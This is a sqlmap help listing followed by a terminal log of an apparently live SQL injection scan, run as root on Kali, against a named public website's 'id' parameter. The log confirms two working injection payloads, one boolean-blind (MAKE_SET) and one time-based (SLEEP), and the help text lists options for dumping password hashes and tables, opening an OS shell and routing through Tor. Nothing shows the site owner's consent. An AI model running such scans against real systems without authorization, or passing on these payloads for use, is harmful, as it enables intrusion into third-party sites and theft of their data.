- Usage: python ./sqlmap [options]
- Options:
- -h, --help Show basic help message and exit
- -hh Show advanced help message and exit
- -v VERBOSE Verbosity level: 0-6 (default 1)
- Target:
- At least one of these options has to be specified to set the source to
- get target urls from
- -u URL, --url=URL Target url
- -g GOOGLEDORK Process Google dork results as target urls
- Request:
- These options can be used to specify how to connect to the target url
- --data=DATA Data string to be sent through POST
- --cookie=COOKIE HTTP Cookie header
- --random-agent Use randomly selected HTTP User-Agent header
- --proxy=PROXY Use a HTTP proxy to connect to the target url
- Injection:
- These options can be used to specify which parameters to test for,
- provide custom injection payloads and optional tampering scripts
- -p TESTPARAMETER Testable parameter(s)
- --dbms=DBMS Force back-end DBMS to this value
- Detection:
- These options can be used to specify how to parse and compare page
- content from HTTP responses when using blind SQL injection technique
- --level=LEVEL Level of tests to perform (1-5, default 1)
- --risk=RISK Risk of tests to perform (0-3, default 1)
- Techniques:
- These options can be used to tweak testing of specific SQL injection
- techniques
- --technique=TECH SQL injection techniques to test for (default
- "BEUSTQ")
- Enumeration:
- These options can be used to enumerate the back-end database
- management system information, structure and data contained in the
- tables. Moreover you can run your own SQL statements
- -a, --all Retrieve everything
- -b, --banner Retrieve DBMS banner
- --current-user Retrieve DBMS current user
- --current-db Retrieve DBMS current database
- --passwords Enumerate DBMS users password hashes
- --tables Enumerate DBMS database tables
- --columns Enumerate DBMS database table columns
- --schema Enumerate DBMS schema
- --dump Dump DBMS database table entries
- --dump-all Dump all DBMS databases tables entries
- -D DB DBMS database to enumerate
- -T TBL DBMS database table to enumerate
- -C COL DBMS database table column to enumerate
- Operating system access:
- These options can be used to access the back-end database management
- system underlying operating system
- --os-shell Prompt for an interactive operating system shell
- --os-pwn Prompt for an out-of-band shell, meterpreter or VNC
- General:
- These options can be used to set some general working parameters
- --batch Never ask for user input, use the default behaviour
- --check-tor Check to see if Tor is used properly
- --flush-session Flush session files for current target
- --tor Use Tor anonymity network
- Miscellaneous:
- --wizard Simple wizard interface for beginner users
- [!] to see full list of options run with '-hh'
- [*] shutting down at 12:15:11
- root@kali:~# sqlmap -u www.fabasket.com/noticia.php?id=1007 --dbs
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 12:15:29
- [12:15:29] [INFO] testing connection to the target url
- [12:15:30] [INFO] testing if the url is stable, wait a few seconds
- [12:15:32] [INFO] url is stable
- [12:15:32] [INFO] testing if GET parameter 'id' is dynamic
- [12:15:32] [INFO] confirming that GET parameter 'id' is dynamic
- [12:15:32] [INFO] GET parameter 'id' is dynamic
- [12:15:33] [INFO] heuristic (parsing) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
- [12:15:33] [INFO] testing for SQL injection on GET parameter 'id'
- heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
- do you want to include all tests for 'MySQL' ignoring provided level (1) and risk (1)? [Y/n] y
- [12:15:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
- [12:16:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
- [12:16:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
- [12:16:06] [WARNING] reflective value(s) found and filtering out
- [12:16:12] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
- [12:16:14] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
- [12:16:19] [INFO] GET parameter 'id' is 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)' injectable
- [12:16:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
- [12:16:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
- [12:16:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
- [12:16:19] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
- [12:16:19] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
- [12:16:20] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
- [12:16:20] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
- [12:16:20] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
- [12:16:21] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
- [12:16:21] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
- [12:16:21] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
- [12:16:22] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
- [12:16:22] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
- [12:16:22] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
- [12:16:22] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
- [12:16:22] [INFO] testing 'MySQL inline queries'
- [12:16:22] [INFO] testing 'MySQL > 5.0.11 stacked queries'
- [12:16:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
- [12:16:23] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
- [12:16:23] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
- [12:16:23] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
- [12:16:23] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
- [12:16:23] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
- [12:16:24] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
- [12:16:24] [INFO] testing 'MySQL >= 5.0 time-based blind - Parameter replace'
- [12:16:25] [INFO] testing 'MySQL < 5.0 time-based blind - Parameter replace (heavy queries)'
- [12:16:25] [INFO] testing 'MySQL time-based blind - Parameter replace (bool*int)'
- [12:17:25] [INFO] GET parameter 'id' is 'MySQL time-based blind - Parameter replace (bool*int)' injectable
- [12:17:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
- [12:17:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
- [12:17:34] [INFO] target url appears to be UNION injectable with 1 columns
- [12:17:35] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. --dbms=mysql)
- [12:17:35] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
- [12:17:40] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
- [12:17:48] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
- [12:17:55] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
- [12:18:03] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
- [12:18:13] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
- [12:18:18] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
- [12:18:22] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
- [12:18:31] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
- [12:18:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
- GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
- sqlmap identified the following injection points with a total of 301 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)
- Payload: id=MAKE_SET(3807=3807,1007)
- Type: AND/OR time-based blind
- Title: MySQL time-based blind - Parameter replace (bool*int)
- Payload: id=(1006=1006)*SLEEP(5)
- ---
- [12:18:48] [INFO] testing MySQL
- [12:18:48] [WARNING] the back-end DBMS is not MySQL
- [12:18:48] [INFO] testing Oracle
- [12:18:49] [WARNING] the back-end DBMS is not Oracle
- [12:18:49] [INFO] testing PostgreSQL
- [12:18:49] [WARNING] the back-end DBMS is not PostgreSQL
- [12:18:49] [INFO] testing Microsoft SQL Server
- [12:18:49] [WARNING] the back-end DBMS is not Microsoft SQL Server
- [12:18:49] [INFO] testing SQLite
- [12:18:49] [WARNING] the back-end DBMS is not SQLite
- [12:18:49] [INFO] testing Microsoft Access
- [12:18:49] [WARNING] the back-end DBMS is not Microsoft Access
- [12:18:49] [INFO] testing Firebird
- [12:18:49] [WARNING] the back-end DBMS is not Firebird
- [12:18:49] [INFO] testing SAP MaxDB
- [12:18:50] [WARNING] the back-end DBMS is not SAP MaxDB
- [12:18:50] [INFO] testing Sybase
- [12:18:50] [WARNING] the back-end DBMS is not Sybase
- [12:18:50] [INFO] testing IBM DB2
- [12:18:50] [WARNING] the back-end DBMS is not IBM DB2
- [12:18:50] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system, but from the HTML error page it was possible to determinate that the back-end DBMS is MySQL. Do not specify the back-end DBMS manually, sqlmap will fingerprint the DBMS for you
- [*] shutting down at 12:18:50
- root@kali:~#